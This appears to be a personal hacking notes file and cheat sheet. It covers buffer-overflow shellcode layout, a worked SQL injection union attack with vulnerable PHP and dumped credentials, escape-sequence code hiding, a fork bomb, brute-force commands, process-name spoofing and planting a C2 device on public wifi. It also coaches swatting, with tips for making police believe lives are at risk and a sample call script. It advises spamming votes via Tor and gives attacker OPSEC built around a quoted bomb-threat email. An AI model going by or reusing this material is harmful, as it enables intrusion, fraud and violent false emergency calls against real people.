# 'u' -> 0x3 -> 'a' -> 0x1 -> 'k' -> 0x8 -> 'o' -> 0x6 -> 'h'
# however our first element with which we calculated
# was 'a' and our chain length was for so in reality:
# _______________________________________________
# 'u' -> 0x3 -> | 'a' -> 0x1 -> 'k' -> 0x8 -> 'o' -> 0x6 -> 'h' |
# `````````````````````````\|``````````````````````
# '
# we are only aware of this part!
#
# so we hash() and reduce(), and hash() and reduce(), then
# Heureka! we have arrived to 'h' which we know!
# we start recalculating our chain from our stored start: 'a',
# but left baffled when our lusted after hash: 0x3
# is no where to be found.
# make no mistake, it was in the chain,
# but not in the slice we knew
return None
Lock_patterns:
• one of the optional method to lock (android) phones
{
_ _ _
|_| |_| |_|
_ _ _
|_| |_| |_|
_ _ _
|_| |_| |_|
}
— rules:
• atleast 4 points must be involved
• atleast 1 corner must be present (due to the previous rule)
• 1/10 people will use a letter as their pattern
{
_ _ _
|O| |_| |O|
|\__ __/|
| \_/ |
|O| |O| |O|
| |
| _ |
|O| |_| |O|
_ _ _
|O----O----O|
| |
| _ |
|O| |_| |O|
| |
| _ |
|O----O----O|
_ _ _
|O----O----O|
|
| _ _
|O| |_| |_|
|
| _ _
|O----O----O|
_ _ _
|O----O----O|
|
| _ _
|O----O----O|
|
_ |
|O----O----O|
_ _ _
|O| |_| |_|
|
| _ _
|O| |_| |_|
|
| _ _
|O----O----O|
_ _ _
|O| |_| |O|
|\__ |
| \_ |
|O| |O| |O|
| \__ |
| _ \|
|O| |_| |O|
_ _ _
|O----O----O|
__/
_ _/ _
|_| |O| |_|
__/
_/ _ _
|O----O----O|
}
— the starting points are not even remotely evenly distributed:
• it does not seem to be affected by left/right handedness
{
┏━━━━━┓ ┌─────┐ ┏━━━━━┓
┃ 44% ┃ │ 9% │ ┃ 15% ┃
┗━━━━━┛ └─────┘ ┗━━━━━┛
┌─────┐ ┌─────┐ ┌─────┐
│ 6% │ │ 4% │ │ 2% │
└─────┘ └─────┘ └─────┘
┏━━━━━┓ ┌─────┐ ┌─────┐
┃ 14% ┃ │ 3% │ │ 4% │
┗━━━━━┛ └─────┘ └─────┘
}
OVERFLOWS: Д$
Int: Int:
• an n bit long int can represent a number pow(2, n)-1 at maximum
-------------------------------
| bits | max value |
-------------------------------
| 2 | 1 |
| 4 | 15 |
| 8 | 255 |
| 16 | 65535 |
| 32 | 4294967295 |
| 64 | 1.844674407x10^19 |
| 128 | 3.402823669x10^38 |
-------------------------------
○ signed:
• if the number we try to assign is >pow(2, n)/2 && <pow(2, n)-1 then the most significant bit,
which supposedly represents the signage gets over written {signed short signed_int = 65000 => -536}
○ unsigned:
• if the number we try to assign is x bit and x > n then the least significant n bits of x will be assigned to n,
so if >pow(2, n)-1 the numbers will loop (starting from 0 again) {unsigned short unsigned_int = 655536 => 1}
Buffer: Buffer:
• whenever a reserved variable (array) grows beyond its intended size, it will over write what ever data is next to it
• if, from a function, it overwrites the part of the stack where the original value of <rip> is stored, on return the jump
will try to follow wherever that value points to, (if its not a deliberate attack) chances are that value will be
outside the program's scope, resulting in a segmentation fault and a crash
• testing if a program has this vulnerability would involve "typing" significantly more characters than expected when prompted
• a program that tests for such a vulnerability is called a fuzzer
• exploited by overwriting the saved return address with a memory location of our liking, which preferably is a nop sled (see BELOW)
leading up to arbitrary shellcode
• ideally the nop sled and the shellcode are injected alongside with the exploit
Protection:
Canary:
• Data Stack Smashing Protector
• a value is placed before <rip>'s original value; in order to overwrite the return address, and thus execute the injected code,
the canary value must also be overwritten; this canary value is checked to make sure it has not changed before a routine pops the
return address
DEP:
• Data Execution Prevention
• marks areas of memory as either executable or nonexecutable
ASLR:
• Data Address Space Layout Randomization
• randomly arranges the address space positions of key data areas of a process, including the base of the executable and the
positions of the stack, heap and libraries
NOP_sled:
• even when aslr is turned of environmental variables might cause the memory addresses to vary
• the idea is to have a pad, or runway before the exploit code to greatly increase the chance of hitting it
• used to be done with nops (no operations (0x90)) hence the name
• nowadays some software actually check for traditional nop sleds therefor other, absolutely useless code is being used
in place of the 0x90s
{
char buffer[200];
_ Starts at: 0xffffc8b8 _
_ Ends at: 0xnfffc91c _
: Nop sled
: Arbitrary shell code
_ In this case: __ msfvenom -p linux/x86/exec ApendExit=true -b "\x00" -s 100 _
: padding
White(): $ebp; do not pay attenrion to the value
: $esp; pay special attention to the value
Gray(): who knows? the rest of the stack
────────────────────────────────────────
_0xnfffc8b8: 0x90909090 0x90909090 0x90909090 0x90909090
_0xnfffc8c8: 0x90909090 0x90909090 0x90909090 0x90909090
_0xnfffc8d8: 0x90909090 0x90909090 0x90909090 0x90909090
_0xnfffc8e8: 0x90909090 0x90909090 0x90909090 0x90909090
_0xnfffc8f8: 0x90909090 0x90909090 0x90909090 0x90909090
_0xnfffc908: 0x90909090 0x90909090 0x90909090 0x90909090
_0xnfffc918: 0x90909090 0x90909090 0xnd06cc98 0xncdad5d9
_0xnfffc928: 0xn424f45a 0xn1c9b106 0xn3c20431 0xna0e036c
_0xnfffc938: 0xn27ab941 0xn38da311 0xn81a0b22 0xn7da3beb
_0xnfffc948: 0xnb75b2d5 0xna9a89aa 0xdeadbeaf 0xdeadbeaf
_0xnfffc958: 0xdeadbeaf 0xdeadbeaf 0xdeadbeaf 0xdeadbeaf
_0xnfffc968: 0xdeadbeaf 0xdeadbeaf 0xdeadbeaf 0xdeadbeaf
_0xnfffc978: 0xdeadbeaf 0xdeadbeaf 0x12345678 0xefc8ffnf
_0xnfffc988: Gray( 0xn0690001 0xn7fda3a6 0xn7ffb000 0xn0002000 )
────────────────────────────────────────
• the first address column is prefixed with a '_' for highlighting
• the hex values have there first char replaced with an 'n'
(except in the cases of "deadbeaf"s and "90..."s)
so they cannot interfere with the subject addressing system;
in reality they obviously would be valid hex chars
}
Return_oriented_programming:
FORMAT_STRING: Д$
• knowledge of Cs vsprintf() is required (see AT /C++/stdio.h/vsprintf)
• injecting [format] in an input which gets passed to a vsprintf() call
will make it read the non-existent arguments from stack memory
INJECTION: Д$
HTML_Injection:
pass
PHP_Command_Injection:
• as PHP uses ';'-s to separate statements a supplying:
([...]);[command]
to a vulnerable input field is extremely powerful
Server_Side_Template_Injection:
• or "SSTI" for short
SQL_Injection:
Example_data:
{ -- ### Init ###
CREATE TABLE users (
id INT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
password VARCHAR(255) NOT NULL,
email VARCHAR(255) NOT NULL
);
CREATE TABLE products (
id INT PRIMARY KEY,
name VARCHAR(255) NOT NULL,
description TEXT,
price DECIMAL(10, 2) NOT NULL
);
-- ### Seeding ###
INSERT INTO users (id, username, password, email)
VALUES
(1, 'admin', 'password123', 'admin@example.com'),
(2, 'john', '123456', 'john@example.com'),
(3, 'jane', '654321', 'jane@example.com'),
(4, 'bob', 'password', 'bob@example.com'),
(5, 'alice', 'password', 'alice@example.com'),
(6, 'charlie', 'password', 'charlie@example.com'),
(7, 'dave', 'password', 'dave@example.com'),
(8, 'emily', 'password', 'emily@example.com'),
(9, 'frank', 'password', 'frank@example.com'),
(10, 'grace', 'password', 'grace@example.com'),
(11, 'henry', 'password', 'henry@example.com'),
(12, 'vanda', 'password', 'vanda@example.com')
;
INSERT INTO products (id, name, description, price)
VALUES
(1, 'Desktop Computer', 'High-performance desktop computer with cutting-edge components', 1500),
(2, 'Gaming Laptop', 'Powerful laptop computer designed for gaming and multimedia', 1800),
(3, 'Tablet', 'Compact and versatile tablet for work and play', 500),
(4, 'Smartphone', 'Advanced smartphone with high-end features and performance', 800),
(5, 'Smart Watch', 'Sleek and stylish smart watch with health and fitness tracking', 300),
(6, 'Wireless Earbuds', 'Comfortable and high-quality wireless earbuds for music and calls', 100),
(7, 'Portable Speaker', 'Wireless and portable speaker with premium sound quality', 150),
(8, 'External Hard Drive', 'High-capacity external hard drive for data storage and backup', 200),
(9, 'USB Flash Drive', 'Small and portable USB flash drive for data transfer and storage', 50),
(10, 'Wireless Router', 'Fast and reliable wireless router for home or office', 100),
(11, 'Network Switch', 'Managed network switch for enterprise-level networking', 500),
(12, 'Server', 'Powerful server for hosting and managing applications and data', 2000),
(13, 'Webcam', 'High-definition webcam for video conferencing and streaming', 80),
(14, 'Printer', 'Versatile printer for high-quality document and photo printing', 250),
(15, 'Scanner', 'Fast and efficient scanner for digitizing documents and images', 150),
(16, 'Monitor', 'Large and high-resolution monitor for work and entertainment', 700),
(17, 'Keyboard', 'Ergonomic and responsive keyboard for comfortable typing', 80),
(18, 'Mouse', 'Precision and customizable mouse for smooth and accurate navigation', 50),
(19, 'Game Controller', 'Immersive and responsive game controller for console or PC gaming', 100),
(20, 'Plan9', 'A free and open source operating system', 1)
;
• exploits that user supplied values are often passed to SQL databases without proper sanitization
• the idea is to have such code that first escape the context its inserted to and then execute whatever
• the goal is remote arbitrary SQL execution
• injecting INSERT or SELECT statement can allow the output to be echo-d back to the attacker
Reconocense:
• modern frameworks do the best to their ability to circumvent it,
meaning no trivial methods will succeed unless
the programmer directly went against the framework
• look for handwritten sites
• the easiest test is to see whether injecting a '\'' causes errors
Union_attack:
{ SELECT <COLUMN>+ FROM <TABLE> WHERE !!INJECTION!! -- <...>;
• single statement valid
• uses the UNION clause of a SELECT statement
• extracts data which was not intended to be seen
{
<!DOCTYPE html>
<html>
<head>
<title>Product List</title>
</head>
<?php
$db = new SQLite3('sqli.sqlite');
$search = isset($_GET['search']) ? $_GET['search'] : '';
$sql = "SELECT * FROM products";
if ($search) {
$sql .= " WHERE name LIKE '%$search%'";
}
?>
<body>
<h1>Product List</h1>
<form action="" method="get">
<label for="search">Search:</label>
<input type="text" name="search" id="search" value="<?php echo isset($_GET['search']) ? $_GET['search'] : ''; ?>">
<button type="submit">Search</button>
</form>
<div>
<span><?=$sql?></span>
<div>
<table>
<tr>
<th>ID</th>
<th>Name</th>
<th>Description</th>
<th>Price</th>
</tr>
<?php
$result = $db->query($sql);
while ($row = $result->fetchArray()):
?>
<tr>
<td><?=$row['id']?></td>
<td><?=$row['name']?></td>
<td><?=$row['description']?></td>
<td><?=$row['price']?></td>
</tr>
<?php
endwhile;
$db->close();
?>
</table>
</body>
</html>
Search input : ' union select * from users --
SELECT * FROM products WHERE name LIKE '%' UNION SELECT * FROM users --%'
1 Desktop Computer High-performance desktop computer with cutting-edge components 1500
1 admin password123 admin@example.com
2 Gaming Laptop Powerful laptop computer designed for gaming and multimedia 1800
2 john 123456 john@example.com
< ... >
• with Columbo-like luck we managed to guess that there is a "users" table with exactly as many columns as we needed (4)
• in reality first one would have to sniff out what tables there are (and which of those are interesting);
this however could require column padding (see BELOW)
}
Column_padding:
• SQL requires that all sides of an union expression shall have the same number of columns
• columns can be padded with dummy data
> SELECT * FROM products WHERE name LIKE '%' UNION SELECT name FROM pragma_table_list() --%'
;
Parse error: SELECTs to the left and right of UNION do not have the same number of result columns
-- Fix
> SELECT * FROM products WHERE name LIKE '%' UNION SELECT name, 1, 1, 1 FROM pragma_table_list() --%';
;
-- < ... >
products 1 1 1
sqlite_schema 1 1 1
sqlite_temp_schema 1 1 1
users 1 1 1
REMOTE_FILE_INCLUSION: REMOTE_FILE_INCLUSION:
• hiding payloads in uploaded files (to servers)
FORGERY: FORGERY:
IDN_homograph_attack: Д$
• a thing pretending to be another, trusted thing, accomplished by using such chars in a name
which look identical or almost identical to the trusted ones
• most common with website domains
{ facebook.com -> facebΟΟk.cΟm }
Deffense:
• hand typing the domain and only ever copy-pasting the subdomain
• see also redirection AT ?!
VOTING: VOTING:
Anonymous: Д
• done by special(, mostly POST/GET) requests containing the voting information
• intercept, study and replicate the request then spam it
• Tor is your friend if only one vote per ip is allowed
Printers:
• LDAP (Lightweight Derectory Access Protocol)
ASCII_injection:
• the idea is to make obviously malicious code invisible inside a script
• assumes that the victim will check the script, but from the cli using cat
• ascii escape sequences are used to confuse cat
$ cat ascii_injection.py
#!/usr/bin/python
print("Hello World!")
exit(0);
$ bat ascii_injection.py
───────┬──────────────────────────
│ File: ascii_injection.py
───────┼──────────────────────────
1 │ #!/usr/bin/python
2 │
3 │ print("Hello World!")
4 │ exit(0);
───────┴──────────────────────────
$ ./ascii_injection.py
evil!
$ xxd ascii_injection.py
00000000: 2321 2f75 7372 2f62 696e 2f70 7974 686f #!/usr/bin/pytho
00000010: 6e0a 0a70 7269 6e74 2822 6576 696c 2122 n..print("evil!"
00000020: 293b 0a65 7869 7428 3029 3b0a 231b 5b32 );.exit(0);.#.[2
00000030: 411b 5b31 4470 7269 6e74 2822 4865 6c6c A.[1Dprint("Hell
00000040: 6f20 576f 726c 6421 2229 1b5b 3145 0a o World!").[1E.
DOS: Д
https://madattheinternet.substack.com/p/a-handful-of-companies-rule-the-internet
• "Denial Of Service"
• DOS is an annoyance, not a victory; see Kaffles vs Kiwifarms
• DOS WILL set back reconnaissance efforts
Fork_bombing:
• exhausting the targets memory by forking processes which they themself fork (recursively)
{
:(){ :|:& };:
: reference the function called ':'; requires an extension to the POSIX shell definition to work
() C style parameter list signaling that a definition will follow for the function being referenced;
atleast one of this or the keyword "function" would be required, and this is the shorter alternative
{ start funtion definition
' ' mandatory whitespace to not offend the shells parser
: call ':', the forkbomb itself, for the first time
| pipe the output of the first forkbomb; shell pipes allow for paralel execution,
this is crutial so that the second forkbomb can be reached too;
technically '&' would work too, Anon took some creative liberties here for art
: call ':', the forkbomb itself, for the second time
& run the second forkbomb in the background; again, ';' would work too, but '&' looks cooler
' ' mandatory whitespace to not offend the shells parser
} end function definition
; terminate command (function definition), to allow us to exec other commands within the same line
: call ':', invoking the forkbomb
}
Delegated_report:
• spam random servers with packets having the spoofed address of the target
• many large / well configured servers will automatically submit abuse complaints
• these abuse complainst have weight as they are legit and come from multiple sources
• this attack has been used to attack tor relay notes
SWATTING: SWATTING:
• the process of calling the cops on someone without legally justified reasons,
usually for fun, for messing with someone or both
• for best effect the cops must think its a life-or-death situation
• a common and quite effective tactic is to call the police in the name of the target
either giving "himself" up or talking nonsense while also making certain that its
obvious that guns and violence are involved
" \
these fuckers (family) keep abusing me, so i lead them up in the closet, \
now they cant get out or ill shoot them, but you should hurry to get here \
and arrest them, cause i dont want to stand here all day, you know \
" - transcript from recorded swatting
TOOLS: TOOLS:
patator [options]
http_fuzz : brute force HTTP
url="<string>" : target url (scheme:
method="[METHOD]" : method; ([METHOD] == GET || POST || HEAD || [...])
header="<string>" : extra header information; (pl.: cookies)
body="<string>" : where the requsting goes (usually)
{username={FILE0}&password={FILE1}&Login=Login&user_token=9042e959eaed42feac782d2716caf144}
<int>=[path] : define FILE[x]; contents of FILE[x] will go here; (passlist||userlist)
FILE[x] : variable; place where insertin will place; (it is literally FILE and a number after it with no space)
follow=[bool] : shall the program follow any redirects found
--threads=<int> : how many threads to use
timeout=<int> : how many seconds to wait for a response
{
patator http_fuzz url="http://127.0.0.1/DVWA/vulnerabilities/brute/?username=FILE0&password=FILE1&Login=Login#" \
0="/home/jacob/Downloads/usernames.txt" 1="/home/jacob/Downloads/passlist.txt" method=GET \
header='Cookie: security=low; PHPSESSID=tb5akqd3qt2bqbm40dduia83ga' -x ignore:fgrep='incorrect'
;
CSRF=$(curl -s -c dvwa.cookie 127.0.0.1/DVWA/login.php | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')
patator http_fuzz method=POST \
url="http://127.0.0.1/DVWA/login.php" \
1=/home/jacob/Downloads/usernames.txt 0=/home/jacob/Downloads/passlist.txt \
body="username=FILE1&password=FILE0&user_token=${CSRF}&Login=Login" \
header="Cookie: security=low; PHPSESSID=${SESSIONID}" \
follow=0 accept_cookie=0 \
— x ignore:fgrep=login.php -x quit:fgrep=index.php \
--threads=1 timeout=3
}
ettercap :
sysctl -w net.ipv4.ip_forward=1
sqlmap [options] : automatic SQL injection tool
— v <int> : verbose; 0-6
— u [URL] : specify [URL] as the target
— g [google_dork] : make [google_dork] google results the targets
--random-agent : randomize agent header
--level=<int> : level of tests to perform; 1-5
--risk=<int> : risk of tests to perform; 1-3
--current-agent : retrieve user
--dump-all : retrive all databases and tables
-----------
blackarch
-----------
• stand alone distro / distro mutation on top of arch*
• can be installed in top of artix
Intallation_on_top_of_arch:
# Run https://blackarch.org/strap.sh as root and follow the instructions.
$ curl -O https://blackarch.org/strap.sh
# Verify the SHA1 sum
$ echo 26849980b35a42e6e192c6d9ed8c46f0d6d06047 strap.sh | sha1sum -c
# Set execute bit
$ chmod +x strap.sh
# Run strap.sh
$ sudo ./strap.sh
# Enable multilib following https://wiki.archlinux.org/index.php/Official_repositories#Enabling_multilib and run:
$ sudo pacman -Syu
Installing_all_tools:
# ?!; fails with unresolved deps
$ sudo -S --noconfirm $(sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u)
--------
Ghidra
--------
• NSA™
• 2 years after its existance has been leaked by Vault 7, the NSA open sourced it;
yes, it did have an obvious backdoor at launch
• GUI
• bindable hotkeys
• themable (which is great, because the default is a bit too low contrast)
Files:
*.gpr : non-shared ghidra project file
*.gzf : "Ghidra Zip File"
Tools:
CodeBrowser:
• main tool
• listing
• decompiler
• analyzer
• symbol tree
• data type manager
— patching:
• files can be edited
• the original executable will remain unchanged
• to export use "File/Export/" and make the format "original"
Debugger:
pass
Emulator:
pass
VersionTracking:
pass
Memory_forensics:
• the art of analizing process memory
• live if the process is running or static if a snapshot is being investigated
○ uses
• game hacking
• cracking
• reverse engineering
• malware detection
tools:
cheatengine : live process memory analizer for windows
scanmem/gameconqueror : live process memory analizer for linux
scan_filtering:
exact value : for known values which are unlikely to change
range : for unknown values or values which are likely to shift around,
but not too drastically
(un)changed : ?!
Cheat_engine_like_layouts:
+---------+--------+
| results | search |
+---------+--------+
| cheat table |
+------------------+
○ search
• where you issue your queries
○ results
• hits to the last query
○ cheat table
• results can be moved here (double click)
• does not reset between queries
• allows for editing the values
• allows for adding a human readable description
• can be export-ed and import-ed
• freeze/lock can be used re-write the address to the current value
whenever a change is detected
Cheat_tables:
*.ct : cheat table file
• static and const offset addressas are trivial to work with
• heap addresses must be recorded through their referencing pointers
• on linux, ADSR is a standard feature, however,
it can be deliberatly turned off using "linux64 -R <process>";
if you spawn a terminal in such a way, child processes will inherit
not having ADSR on, meaning your cheat tables stay valid between processes
------------
Metasploit
------------
• "MetaSploit Framework"
service postgresql
Programs:
msfcli : cli interface for metasploit
msfconsole [options] : spawn a metasploit shell
help
banner : display an awesome metasploit banner (a random one of many)
search [options] <string> : search for <string> in module names and description
platform:<string> : search for only <string> platform
use [path] : load module at [path]
then:
show : show info about loaded module
options : show options
payloads : show compatible payloads
set [option] [value] : set module [option] (listed by "options") to value
exploit : starts exploit
exit : duh
msfvenom [options] : metasploit standalone payload generator;
— l [subject] : list all [subject]s; subject may be any non-usual "[]" enclosed keyword
— p [payload] : select payload to operate on
— e [encoder] : select encoder (used for limiting usable chars)
— b [chars] : specifiers bad chars, which shall not be used { -b "\x00\x10" }
— s <int> : the maximum length of the resulting payload
its the combination and replacement for msfencode and msfpaylopad
armitage : gui interface for metasploit
Code_cave:
• unused bytes in a processes memory
— can be used to store arbitrary code:
• runtime patched in hacking
• static in reverse engineering
• the size of the cave is an inherent restraint
• has the advantage of not break-ing the executable/process
○ sources
• compiler generated for memory alignment
Process_hollowing:
• when malware overwrites code regions of legitimate processes with shell code
— used to hide malware:
• name remains legitimate
• invocation environment remains legitimate {launch time/purpose; ENV}
• behaviour could remain mostly legitimate
• requires debugging facilities
Shared_library_injection:
• can hide in plain sight
• easily writable in C
GOT_PLT_overwrite:
• GOT and PLT are functional equivalents under windows and linux respectively
• they store the addresses of dynamically loaded functions
• the addresses can be overwritten to point to arbitrary code
C2:
• or "C&C"
• "Command and Control"
• used to characterize a persons relation ship to a computer
• mostly relevant when descibing the privileges on a remote server
Blue_team_vs_Red_team:
• a reference to something ?!
• the blue team always defends
• the red team always attacks
• in this context blue teams refers to trying not to get fucked over,
while the red team attempts to fuck over
OPSEC:
○ phases of operation
• used by investigators
• should be used by attackers
1. Target Selection
2. Planning (and Surveillance)
3. Deployment
4. Execution
5. Escape and Evasion
{
_Phase 1: Target Selection_
The strategic target was the hall hosting the final exam.
Tactically, the principal selected “email addresses at random” to
receive a bomb threat intended to force an evacuation of the hall,
along with a number of other cover locations.
_Phase 2: Planning_
This step appears to have been focused solely on the technical requirements of
masking the origination of the threatening emails. However, insufficient resources
were devoted to this phase, and therefore it was fundamentally flawed.
_Phase 3: Deployment_
The operative chose to use GuerrillaMail to send the emails,
and because GuerrillaMail reveals the source IP of the sender,
he also chose Tor to mask his IP address. However, he used a monitored network
to access Tor, which severely limits the anonymity provided by Tor.
This error was to prove fatal.
_Phase 4: Execution_
Kim used the Harvard University wifi network. To gain access,
he had to login with his username and password. The university monitors and
logs all network activity. This was the fatal error. He authenticated to the network,
his IP was used to access Tor, and this information was logged.
When the incident was investigated the FBI was able to pull the logs and
determine not just whether anyone had accessed Tor, but exactly who had accessed Tor.
_Phase 5: Escape and Evasion_
There was nothing at all done for this phase. It is worth noting that there is
little he could have done to prepare for an interview by seasoned professional
FBI interrogators. As an amateur, he stood approximately zero chance of surviving.
}
• "No logs, no crime. Do not keep any unnecessary logs. If there is operationally critical information, \
make a record of that information. Practically, this means: cut and paste into a file; keep that file encrypted."
• "Migrating communications infrastructure and changing identities regularly is a good idea. \
It creates chronologically compartmented silos of info that limit the impact of a compromise. \
It can provide plausible deniability, and it can reduce the severity of a compromise. \
Do not contaminate between the compartments. And, of course, ensure that each commo channel is secure."
_2013_Hardward_bomb_thread:
" \
shrapnel bombs placed in: \
\
science center \
sever hall \
emerson hall \
thayer hall \
\
2/4. guess correctly. \
\
be quick for they will go off soon \
"
• he provided cover locations, attempting to prolong the bomb search
by suggesting that some locations where legitimately bomb free
SDR:
• "Surveillance Detection Route"
Process_name_spoofing:
https://doubleagent.net/process-name-stomping/
• strange processes running with unusual compute loads can be a red flag
• malware often renames itself
Unix:
// @BAKE gcc $@ -o $*.out
signed main(int argc, char * argv[]) {
strcpy(argv[0], "rabbit");
while (1) { ; }
}
• not FreeBSD or Solaris
Linux:
• reallocating argv with prctl(2)/PR_SET_MM can avoid corrupting the stack while spoofing
• processes that invoke the prctl(2)/PR_SET_NAME will change their /proc/[pid]/comm,
/status, /[tid]/comm, /[tid]/status, etc. names
• discrepancies between comm and cmdline can be used for detection (/proc/[pid]/exe)
Email_obfuscation:
• various techniques to prevent bots from farming email addresses
○ methods
• URL encoding
• replacing symbols with enclosed words { anon(underscore)4242(at)yahoo(dot)com }
• translation to html special chars
• Js
• SVG
---------
objdump
---------
objdump [options] [files] : displays informations from object files
its main problem is that it depends on section tables (similar to gdb);
this means that it cannot disassemble Fasm for example
---------
radare2
---------
• ITS A BLOODY MEME; DO NOT BOTHER
" | aF same as above, but using anal.depth=1"
— radare2, a?
Programs:
radare2 [options] <file> : main executable
r2 : alias of radare2
Commands:
[subject]? : gets help
Modes:
Visual:
V
• in interface, comparable to Vim
Panels:
v
• proper TUI
-----------
OWASP ZAP
-----------
zap : Zed Attack Proxy; request interceptor
insert a break point to actually stop requests from going throught
. ### Planting a C2 ###
• the idea is to have a minimalist, transportable C2 server planted by some public wifi
1. Get the appropriate gadgets
• be smart enough to buy it anonymously
— list of gadgets:
— Raspberry Pi 3 model A+:
• cheap as hell
• has built in wifi
— boot SD card:
• literally any will do
— USB storage
• preferably as physically small as possible
— appropriate power adapter
• be careful, average adapters are not strong enough
2. Install a *nix
• Devuan is recommended
• use rpi-imager, because its great
3. Setup SSH
4. Setup the network
#
Mimetype_spoofing:
• the act of messing with mimetype magick bytes to bypass file upload filters
irc
#define irc \
I------------------------------------\
I------------------------------------\
I------------------------------------\
I /$$$$$$ /$$$$$$$ /$$$$$$ \
I |_ $$_/| $$__ $$ /$$__ $$ \
I | $$ | $$ \ $$| $$ \__/ \
I | $$ | $$$$$$$/| $$ \
I | $$ | $$__ $$| $$ \
I | $$ | $$ \ $$| $$ $$ \
I /$$$$$$| $$ | $$| $$$$$$/ \
I |______/|__/ |__/ \______/ \
I------------------------------------\
I------------------------------------\
I------------------------------------I
• "Internet Relay Chat"
• chat protocol
• plain text/ssl
• minimal overhead
• does not implement accounts
• ephemeral connection model
• many FOSS servers, clients and bots
• very hackable (MIT sense)
• IRC is incredible for getting compsci help;
many large projects have channels -official or otherwise;
while communication is usually not quite as rapid
as on other parts of the Internet, the quality is significantly higher;
this is partially due to the fact that old -and therefor well experienced-
software developers simply never moved on from the platform
○ largest servers
irc.libera.chat - home to many large projects {GNU}
irc.rizon.net - home to many IB related groups; basically chaos
irc.dal.net
○ ports
6665..6669 - plain text
6667 - default plan text
6695..6699 - ssl
6697 - default ssl
Channels:
• the main component of servers
• they are chat rooms
• one must connect ("join") them individually
#channel : network wide channel; default; most common
&channel : server wide channel
!channel : netsplit-riding channel-takeover exploit resistant channel; deprecated
Commands:
/<command> (<args>)
• these are purely conventional, any client has the right to override them
server <verb>
add <name> <address>
del <name>
connect <server> : connect to saved server named <server>
join <channel> : join channel <channel>
nick <nick> : change nick name to <nick>
me <action> : "perform" action; signal that you are doing and not saying something
Private_messages:
• irc supports them
• all private messages go through the server unencrypted
Conventions:
NickServ : "NICKname SERVer" is an iconic bot responsible for reserving nick names and
providing user identity credibility
/msg NickServ <command>
REGISTER <password> <email>
IDENTIFY <nick> <password>
ChanServ : "CHANel SERVer" is an iconic bot responsible for managing channel roles;
you message her to recieve your permissions on record
/msg ChanServ REGISTER <channel> <password> <description>
/msg ChanServ <role> <channel> : claims/temporarly abandons privelegs
OP
DEOP
/msg ChanServ <role> <channel> <nick> : adds a temporary role
VOICE
DEVOICE
HALFOP
DEHALFOP
OP
DEOP
PROTECT
DEPROTECT
OWNER
DEOWNER
/msg ChanServ <VOP|HOP|AOP|SOP> <channel> <ADD|DEL> : adds a perminant role
ircd-hybrid : "IRC Daemon HYBRID"
Files:
/etc/ircd-hybrid/
weechat : terminal IRC client; recommended
Text_formatting:
[Ctrl] + [c] && <code>
b : bold
i : italics
v : reverse
_ : underline
o : reset to normal
c <color>
00 - white
01 - black
02 - blue
03 - green
04 - lightred
05 - red
06 - magenta
07 - brown
08 - yellow
09 - lightgreen
10 - cyan
11 - lightcyan
12 - lightblue
13 - lightmagenta
14 - darkgray
15 - gray
Fset:
• plugin
• the preferred way for configuring
/fset
<arrow-keys>
[Alt] + [Enter] / [Mouse2]
Commands:
/<command>
connect <server>
reconnect <server>
disconnect <server>
join (-server <server>) <channel>
quote (-server <server>) (PASS) <...> : send raw data to a server;
send special commands to your bouncer this way
server <verb>
add <name> <address>/port
whois <name> : list client information on <name> and joined channels
irssi : minimalistic TUI IRC client; recommended
hexchat : graphical IRC client; recommended
mIRC : graphical IRC client
kiwi : browser IRC client
thunderbird : yes, it seriously supports IRC; its not bad;
recommended if you are a thunderbird fan
• IRC connection proxies
• it connects to a real server, as a regular IRC client, clients connect to it as a server
and the bouncer internally syncs messages
• it stays connected indefinitely, meaning no messages are lost
• great for mobile devices (where connection is unreliable)
Example:
+---------+
| Bouncer |
+------+ +. . . . .+
| Kiwi | <---> | Server |
+------+ | |
| A |
| | |
| V |
| | +-------------+
| Client | <---> | IRCd-Hybrid |
+---------+ +-------------+
znc : advanced irc bouncer with webadmin
Files:
~/.znc/
/var/lib/znc/
<znc_dir>/config/znc.conf
Webadmin:
. localhost:<config::Listener::Port>
• light weight
• dependency less
• actually good UX design
Commands:
(<esc>)znc <command>
• all commands live behind the znc namespace
{
/quote -server myBouncer znc help
}
### Bouncing to Onion servers ###
/etc/init.d/bouncer-tor-ncat {
command="/usr/bin/ncat"
command_args="-lk ircre.localhost 6699 -e '/usr/bin/ncat ircre.localhost 6697 --proxy 127.0.0.1:9050 --proxy-type socks5'"
command_background=true
}
/etc/hosts + {
127.0.69.1 ircre.localhost
}
/etc/tor/torrc + {
MapAddress irc.localhost ausidhiahdiahslajdahudlalkjadkahdiuhsajojjjjzuiasidhahad.onion
}
#